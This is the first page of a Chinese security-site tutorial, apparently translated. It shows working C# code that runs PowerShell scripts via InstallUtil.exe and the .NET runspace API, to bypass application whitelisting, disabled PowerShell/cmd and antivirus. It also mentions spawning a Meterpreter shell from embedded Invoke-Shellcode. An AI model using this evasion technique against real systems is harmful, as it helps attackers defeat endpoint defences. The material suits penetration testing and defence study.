欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

禁用了PowerShell又如何?看我如何用PowerShell绕过应用白名单、环境限制、以及杀毒软件

来源:本站整理 作者:佚名 时间:2016-09-02 TAG: 我要投稿


温故而知新
在之前的文章中,我们讨论了如何通过Casey Smith(@ subTee)设计出的方法来绕过反病毒软件和应用白名单。这一次,我们的测试条件将变得更为苛刻。用于测试的目标系统中不仅设置有反病毒软件和应用白名单,而且还禁用了PowerShell和命令行工具(cmd.exe)。在测试的过程中,我们也遇到了各种各样的问题,我们将在这篇文章中讨论这些问题和测试过程中所发生的意外情况。
现在,越来越多的公司开始逐渐意识到,普通用户其实根本就不需要使用命令行工具(cmd.exe)、PowerShell、以及其他一些看起来比较高大上的工具。我们也发现,禁用这些高级工具也是保护系统安全的一种非常好的实践方法。
如果你看过我们出的《Sacred Cash Cow Tipping》系列视频,那么你应该还记得我当时设计出了一种能够在C#程序中执行Invoke-Shellcode.ps1文件的方法。实际上,你只需要直接将这个Invoke-Shellcode.ps1文件中的代码全部放在一行,然后将该文件的所有内容嵌入到C#程序的一个字符串变量中就可以了。你将会得到一个独立的可执行文件,它可以生成一个Meterpreter Shell,并且可以绕过目前绝大多数的反病毒产品。
 
写在前面的话
那么,刚才所介绍的那些内容与我们这篇文章有半毛钱关系吗?当然有了,不然我 介绍来干嘛。实际上,我们只需要将刚才这一概念稍微扩展一下,就可以轻松地在一个禁用了PowerShell的环境中执行任意的PowerShell脚本了。

我们应该怎么做呢?从本质上来讲,C#和PowerShell其实都是运行在.Net框架之上的高级实现。这也就意味着,我们可以通过C#可执行程序直接调用.Net框架开放给PowerShell的那部分功能。如果你愿意的话,你可以编写一个C#程序,然后用它来实现PowerShell脚本的所有功能。
 
少说话,多做事
准备工作已经做得差不多了,让我们开始动手实现吧!首先,在你的Windows桌面上用记事本创建一个新的文本文件,然后将其重命名为Program.cs。好吧..其实随便你取什么名字都可以,这只是个不成熟的小建议。创建完成之后,用NotePad++之类的文本编辑器打开它。现在,我们需要在文件的顶部写入下列声明语句,并引入我们所要使用到的某些功能:
using System;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.Management.Automation.Runspaces;
为了确保我们的程序能够编译成功,我们还需要定义一个类,并在这个类中添加一个Main()方法。通常情况下,我们的程序都会从这个Main()函数那里开始执行。需要注意的是,这个类的类名必须与我们的文件名(Program.cs)相同。将下列代码添加到资源声明语句的下方:
public class Program
 {
    public static void Main()
    {
    }
 }
接下来,我们要定义程序真正的入口函数了。请注意,我们需要使用InstallUtil.exe工具来运行我们的程序,而不是直接用鼠标左键双击运行。我就不卖关子了,正是这一技巧将帮助我们绕过应用白名单的限制。
为了完成我们的目标,我定义了一个名为“Sample”的类,并让它继承Installer类。然后,我还声明了一个名为“Uninstall”的方法,这个方法就是我们程序真正的入口函数。所以,我们的程序所要执行的第一个任务就是调用这个名为“Exec”的方法(Exec()是Mycode类中的一个方法)。除此之外,我们还要在这个类的上方添加一条声明语句,用来表示这个类需要在程序的安装过程中被调用执行。在Program.cs文件的底部添加下列代码:
[System.ComponentModel.RunInstaller(true)]
 public class Sample : System.Configuration.Install.Installer
 {
 public override void Uninstall(System.Collections.IDictionary savedState)
 {
 Mycode.Exec();
 }
 }
我们所要写的最后一部分代码就是去定义一个Mycode类,然后在这个类中添加一个名为“Exec”的方法。这个方法可以根据用户提供的文件路径读入一个PowerShell脚本,脚本路径定义在符号@“”的双引号之中。在我的测试环境中,我的PowerShell脚本存储路径为“C:\Users\fmc\Desktop\PowerUp.ps1”,接下来的代码用来设置PowerShell脚本在执行过程中所要使用到的变量和参数。
最后,在pipeline.Invoke()函数被调用之后,也就意味着我们的PowerShell脚本被执行了。将下列代码添加到Program.cs文件的末尾处:
public class Mycode
 {
 public static void Exec()
 {
 string command = System.IO.File.ReadAllText(@"C:\Users\fmc\Desktop\PowerUp.ps1");
 RunspaceConfiguration rspacecfg = RunspaceConfiguration.Create();
 Runspace rspace = RunspaceFactory.CreateRunspace(rspacecfg);
 rspace.Open();
 Pipeline pipeline = rspace.CreatePipeline();
 pipeline.Commands.AddScript(command);
 pipeline.Invoke();
 }
 }
Program.cs文件完整的代码如下所示:
using System;
 using System.Configuration.Install;
 using System.Runtime.InteropServices;
 using System.Management.Automation.Runspaces;
 public class Program
 {
 public static void Main()
 {
 }
 }
 [System.ComponentModel.RunInstaller(true)]

[1] [2] [3]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载